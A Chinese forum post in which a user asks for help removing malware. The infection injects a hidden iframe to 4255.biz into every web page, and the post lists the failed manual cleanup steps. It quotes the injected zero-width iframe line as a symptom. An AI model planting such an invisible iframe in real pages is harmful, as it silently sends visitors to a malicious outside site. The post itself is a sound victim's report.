【求助】请高手看下我手工查杀4255.biz失败的过程
昨天电脑被别人借去用了下,就中了这个病毒,唉唉
特征是不管用什么浏览器,网页代码上基本都被添加了一行:
<iframe src=http://4255.biz/ width=0 height=0 frameborder=0></iframe>
发现Opera和IE7都一样,不能避免4255.biz的访问。估计应该是更底层的hooks,而不是IE加载项的问题。
为了进一步确认是否是Hack.SuspiciousAni,我用UE打开了user32.dll,没有发现4255的字符串。而且我的Windows已经进行了更新。
用我电脑上装的VMware的Windows2k,发现没感染;而在带网络连接的安全模式下,症状依然存在。也初步排除了病毒在驱动层。
用Autoruns检查各种启动加载项,没发现任何不可信任的启动程序。
用ProcessExplorer检查IE和Opera的加载dll,并挨个搜索DLL里的字符串,也没有发现问题,检查上层Explorer的加载dll,也没有发现问题。同时检查了是否有可疑的服务和EXE程序,还是没发现什么。
现在我只能用hosts文件屏蔽掉4255.biz这个垃圾网站,但是还是觉得不舒服,没搞定丫。
总之很郁闷,头一次遇到这么恶心的病毒,谁来帮帮忙啊。
